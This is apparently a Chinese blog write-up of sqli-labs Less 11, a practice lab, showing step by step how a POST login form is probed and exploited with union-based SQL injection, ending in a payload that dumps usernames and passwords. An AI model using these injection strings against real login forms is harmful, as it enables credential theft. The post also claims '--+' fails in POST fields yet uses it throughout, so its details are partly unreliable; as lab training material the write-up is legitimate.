sqli-labs靶场 less 11

文章目录


sqli-labs靶场

每道题都从以下模板讲解,并且每个步骤都有图片,清晰明了,便于复盘。

sql注入的基本步骤

  • 注入点
  • 注入类型
    • 字符型:判断闭合方式 ('、"、''、"")
    • 数字型
  • 根据实际情况,选择合适的注入方式
  • 获取数据库名,表名,列名,数据

less 11 POS联合注入

  • 题目类型:

细节:

Post输入框中,--+注释符不起作用,#注释符可以用

判断闭合方式

输入uname= a' 提示报错 ''1'' and password='' LIMIT 0,1'

根据报错得到,and连接用户名和密码

uname=1'--+ 没有提示报错,说明闭合成功,所以闭合方式是单引号

判断列数

uname=1'order+by+3--+

uname=1'order+by+2--+

无报错,说明该页面sql语句查询返回的字段数是二列

uname=1'union+select+1,2--+

联合注入报数据

uname=1'union+select+1,(select+substr((group_concat(username,password)),1,32)+from+users)--+

通过substr截取出全部数据

相关推荐
知识分享小能手5 小时前
微信小程序入门学习教程,从入门到精通,微信小程序常用API(上)——知识点详解 + 案例实战(4)
前端·javascript·学习·微信小程序·小程序·html5·微信开放平台
清灵xmf5 小时前
CSS field-sizing 让表单「活」起来
前端·css·field-sizing
文火冰糖的硅基工坊5 小时前
[光学原理与应用-480]:《国产检测设备对比表》
前端·人工智能·系统架构·制造·半导体·产业链
excel5 小时前
Qiankun 子应用生命周期及使用场景解析
前端
weixin_446260856 小时前
Django - 让开发变得简单高效的Web框架
前端·数据库·django
ObjectX前端实验室7 小时前
【react18原理探究实践】异步可中断 & 时间分片
前端·react.js
SoaringHeart7 小时前
Flutter进阶:自定义一个 json 转 model 工具
前端·flutter·dart
努力打怪升级7 小时前
Rocky Linux 8 远程管理配置指南(宿主机 VNC + KVM 虚拟机 VNC)
前端·chrome
brzhang7 小时前
AI Agent 干不好活,不是它笨,告诉你一个残忍的现实,是你给他的工具太难用了
前端·后端·架构
brzhang7 小时前
一文说明白为什么现在 AI Agent 都把重点放在上下文工程(context engineering)上?
前端·后端·架构